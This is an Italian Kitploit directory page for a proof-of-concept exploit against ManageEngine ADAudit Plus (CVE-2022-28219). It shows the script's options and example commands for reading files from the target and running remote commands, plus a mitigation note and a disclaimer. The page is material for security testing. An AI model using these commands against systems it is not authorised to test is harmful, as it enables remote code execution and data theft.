Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-28219 — PoC per ManageEngine ADAudit Plus CVE-2022-28219 | Kitploit
Strumenti/GitHubGitHub/horizon3ai/cve-2022-28219
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubhorizon3ai/cve-2022-28219

CVE-2022-28219

PoC per ManageEngine ADAudit Plus CVE-2022-28219

Vedi Repository
43154 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-28219

POC per CVE-2022-28219 che colpisce le build di ManageEngine ADAudit Plus precedenti alla 7060

Analisi Tecnica

Maggiori dettagli sul nostro blog: https://www.horizon3.ai/red-team-blog-cve-2022-28219

Utilizzo

root@kitploit:~
% python3 CVE-2022-28219.py -h
usage: CVE-2022-28219.py [-h] -t TARGET -l LHOST -d DOMAIN [-lhp HTTP_PORT] [-lfp FTP_PORT] [-f FILE] [-c COMMAND] [-u USER]

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target URL with port
  -l LHOST, --lhost LHOST
                        local bind IP
  -d DOMAIN, --domain DOMAIN
                        fully qualified domain served by ADAudit Plus
  -lhp HTTP_PORT, --http-port HTTP_PORT
                        local HTTP port to bind to
  -lfp FTP_PORT, --ftp-port FTP_PORT
                        local FTP port to bind to
  -f FILE, --file FILE  get file or directory listing at given path, use forward slashes and don't include drive, e.g. /windows/win.ini or /users
  -c COMMAND, --command COMMAND
                        command to execute, e.g. calc.exe
  -u USER, --user USER  user running ADAudit Plus app, useful for finding upload file quickly
Scarica lo strumento

Ad esempio, per ottenere il file c:\windows\win.ini:

python3 CVE-2022-28219.py -t <target_url> -l <attacker_ip> -d <target_fqdn> -f /windows/win.ini

Oppure per eseguire calc.exe sul target:

python3 CVE-2022-28219.py -t <target_url> -l <attacker_ip> -d <target_fqdn> -c calc.exe

Nota: il recupero dei file e l'esecuzione remota di codice richiedono che ManageEngine ADAudit Plus sia in esecuzione su Java runtime 8u121 o precedente. Questo sarà vero la maggior parte delle volte poiché la versione predefinita di Java runtime in bundle con ADAudit Plus è 8u051.

Mitigazione

Aggiorna a ManageEngine ADAudit Plus build 7060 o successiva.

Segui il Team Attack di Horizon3.ai su Twitter per le ultime ricerche sulla sicurezza:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Dichiarazione di non responsabilità

Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzato. I maintainer del progetto non sono responsabili per un uso improprio del software. Usalo in modo responsabile.